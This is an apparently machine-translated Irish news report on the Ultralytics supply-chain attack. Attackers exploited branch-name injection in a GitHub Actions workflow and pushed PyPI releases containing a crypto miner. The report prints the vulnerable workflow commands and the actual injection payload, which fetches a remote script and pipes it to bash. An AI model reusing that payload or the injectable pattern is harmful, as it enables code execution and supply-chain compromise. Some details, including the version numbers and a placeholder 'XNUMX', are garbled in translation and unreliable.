Bhí na hionsaitheoirí in ann cód a fhorghníomhú le cearta láimhseálaí GitHub Actions i stór leabharlainne Ultralytics Python, a úsáidtear chun fadhbanna fís ríomhaire a réiteach mar rudaí a bhrath in íomhánna agus íomhánna deighilte. Tar éis dóibh rochtain a fháil ar an stór, d'fhoilsigh na hionsaitheoirí roinnt eisiúintí Ultralytics nua san eolaire PyPI, lena n-áirítear athruithe mailíseach do mhianadóireacht cryptocurrency. Le mí anuas, tá leabharlann Ultralytics íoslódáilte ó chatalóg PyPI níos mó ná 6.4 milliún uair.
Chun an stór a chomhréiteach, baineadh úsáid as leochaileacht sa phacáiste gníomhartha ultralytics, a úsáidtear chun láimhseálaithe a sheoladh go huathoibríoch nuair a dhéantar gníomhartha áirithe ar stór ar GitHub ag baint úsáide as meicníocht Gníomhaíochtaí GitHub. Sa tionscadal ultralytics, bhí an láimhseálaí leochaileach ceangailte leis an imeacht pull_request_target agus glaodh air nuair a tháinig iarratais nua ar tharraingt. Go háirithe, chun an cód a fhormáidiú sna hiarratais ar tharraingt seolta, glaodh an láimhseálaí format.yml agus cuireadh an cód a shonraítear sa chuid “rith” den chomhad action.yml i gcrích, ina raibh orduithe sliogán le patrúin ionadaíochta: git pull origin ${{ github.head_ref || github.ref }} git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}"
Mar sin, cuireadh ainm an bhrainse Git a luadh san iarratas ar tharraingt isteach in orduithe blaosc gan éalú ceart. Is fiú a lua gur shocraigh an pacáiste ultralytics-gníomhaíochtaí cheana féin i mí Lúnasa leochaileacht chomhchosúil a bhaineann le húsáid luach seachtrach san fheidhm macalla: macalla “github.event.pull_request.head.ref: ${{ github.event.pull_request .head.ref }} »
Chun forghníomhú a gcód a eagrú i gcomhthéacs láimhseálaí GitHub Actions, chuir na hionsaitheoirí iarratas tarraingt chuig an stór ultralytics, ag sonrú an méid seo a leanas mar ainm an bhrainse: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Dá réir sin, nuair a fuarthas iarratas ar tharraingt, cuireadh an teaghrán sonraithe “$(…)” isteach sa chód, agus, nuair a seoladh an láimhseálaí ina dhiaidh sin, rinneadh an cód “curl -sSfL raw.githubusercontent. com/…/file.sh | bash".
Is féidir cód reatha i gcomhthéacs GitHub Actions a úsáid chun comhartha rochtana stórtha agus sonraí íogaire eile a ghabháil. Cé go díreach a d'éirigh leis na hionsaitheoirí scaoileadh a ghiniúint, nach bhfuil an cumas acu a gcód a fhorghníomhú i nGníomhartha GitHub, fós soiléir; glactar leis go raibh sé seo indéanta mar gheall ar athrú ar an láimhseálaí publish.yml (bhain na hionsaitheoirí fíorú an cuntas a cheadaítear eisiúintí a fhoilsiú i PyPI) agus úsáid na teicneolaíochta nimhiú an taisce a thógáil GitHub Actions chun do shonraí a chur isteach sa scaoileadh.
Foilsíodh an chéad eisiúint mailíseach de Ultralytics 8.3.41 ag na hionsaitheoirí ar PyPI ar an 4 Nollaig ag 23:51 PM (MSK) agus baineadh í ag 12:15 PM an lá dár gcionn. Ag 15:47 PM, postáladh eisiúint eile, 8.3.42, agus baineadh í ag 16:47 PM. Dá bhrí sin, bhí na leaganacha mailíseacha ar fáil lena n-íoslódáil ar feadh thart ar 13 uair an chloig san iomlán (taifeadann PyPI thart ar 250 íoslódáil de leabharlann ultralytics in aghaidh an lae). Bhí cód in eisiúint 8.3.41 agus 8.3.42 a íoslódáladh ó sheachtrach. freastalaí Comhpháirt XMRig le haghaidh mianadóireachta cryptocurrency.
Shocraigh forbróirí an tionscadail an fhadhb agus chruthaigh siad eisiúintí ceartaitheacha 8.3.43 agus 8.3.44, ach dhá lá ina dhiaidh sin rinneadh ionsaí eile, inar fhoilsigh na hionsaitheoirí dhá eisiúint mailíseach breise inniu ag 04:41 agus 05:27 (MSK) - 8.3.45. 8.3.46 agus 8.3.44, lena n-áirítear cód mianadóireachta eile. Go dtí deireadh an imscrúdaithe, moltar d'úsáideoirí fanacht siar ar leaganacha nua a shuiteáil agus scaoileadh XNUMX a shocrú mar spleáchais.
Foinse: oscailtenet.ru
